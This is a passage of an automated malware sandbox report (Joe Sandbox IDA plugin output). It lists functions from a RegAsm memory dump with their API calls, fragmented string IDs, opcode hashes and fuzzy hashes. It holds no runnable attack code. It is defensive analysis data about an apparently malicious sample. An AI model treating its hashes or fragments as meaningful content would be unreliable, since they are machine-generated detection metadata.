                                                                  • String ID: !$#$($-$0$2$4$7$8$9$?$?$H$V$e
                                                                  • API String ID: 2610073882-164105402
                                                                  • Opcode ID: 1f1cf35395537e64b000c6efbc98a63c107d8345a00cbe81b9758d42e2734ac3
                                                                  • Instruction ID: cdf3b5065cd44c78a25137ca5eabd9af70e9919f95baf298e5e50d8634074577
                                                                  • Opcode Fuzzy Hash: 1f1cf35395537e64b000c6efbc98a63c107d8345a00cbe81b9758d42e2734ac3
                                                                  • Instruction Fuzzy Hash: 1C41E7600087C1CED726DF2C8488606BFA06F26224F488ADDD8E54F7DBC375E519CBA6
                                                                  Function 00436BEE Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 83COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                  • API String ID: 2610073882-100263010
                                                                  • Opcode ID: 7a16bc65f0334d1c2e074e8fe1d00586703c7d9acbe3629dff512b6bf4ce12e7
                                                                  • Instruction ID: 27a84024d9b4b92c8d6edf8d148b05a3a7dd72626f3d5901dcadd4859abb0c79
                                                                  • Opcode Fuzzy Hash: 7a16bc65f0334d1c2e074e8fe1d00586703c7d9acbe3629dff512b6bf4ce12e7
                                                                  • Instruction Fuzzy Hash: AD410320408B818ED715DF28C488616BFE1AB16314F088A9DD8EA4F797C379E519CBA2
                                                                  Function 00437333 Relevance: 28.1, APIs: 2, Strings: 14, Instructions: 77COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • VariantClear.OLEAUT32(04EC839E), ref: 0043733D
                                                                  • VariantInit.OLEAUT32 ref: 0043734C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearInit
                                                                  • String ID: 2$a$c$e$f$g$i$q$s$u$w$y${$}
                                                                  • API String ID: 2610073882-100263010
                                                                  • Opcode ID: 8ebd9f4ed5494e62f42b018d346a7ac36c6e36cd5ee66e56a8b11b3574fb4437
                                                                  • Instruction ID: 1c9f208004a732e118f2501c515b945d844519df74fdbedcee51dd58d27ec161
                                                                  • Opcode Fuzzy Hash: 8ebd9f4ed5494e62f42b018d346a7ac36c6e36cd5ee66e56a8b11b3574fb4437
                                                                  • Instruction Fuzzy Hash: DA41D630508B818ED715DF28C584716BFE1AB16314F088A9DD8EA4F797C379E519CBA2
                                                                  Function 00428680 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 391COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 8U!W$AK$D^$I\$L!_#$dE;G
                                                                  • API String ID: 0-1822214113
                                                                  • Opcode ID: 0c4b37c98de53600dfd4ef16a9103f5cfec24dc3029a504c7249ea61c68bbd43
                                                                  • Instruction ID: e8dc5652ff6eac58c8cff6491874245c63b14013ac8cf1601e891aa925ef3829
                                                                  • Opcode Fuzzy Hash: 0c4b37c98de53600dfd4ef16a9103f5cfec24dc3029a504c7249ea61c68bbd43
                                                                  • Instruction Fuzzy Hash: ADE153B4209340ABD310DF55EA80A1FBBF0EB86B44F50492EF4C59B252D778D905CBAB
                                                                  Function 004361D5 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 165memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.1794976282.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                  Similarity
                                                                  • API ID: AllocString
                                                                  • String ID: -$.$/$0$1$3
                                                                  • API String ID: 2525500382-387867814
                                                                  • Opcode ID: 7940db7b379f922317e7e15a24e26e61411b35062eb14db6cbc1a2197edd3dd7
                                                                  • Instruction ID: 660070051efc564603ea8c5fbdd00a6cbbb9cf6a35b09dbfd3aeab06d863ec1c
                                                                  • Opcode Fuzzy Hash: 7940db7b379f922317e7e15a24e26e61411b35062eb14db6cbc1a2197edd3dd7
                                                                  • Instruction Fuzzy Hash: E3919260508BC38AC3268B3C8888605FFA16B67234B4887DDE5F54F7E3D364D586C7A6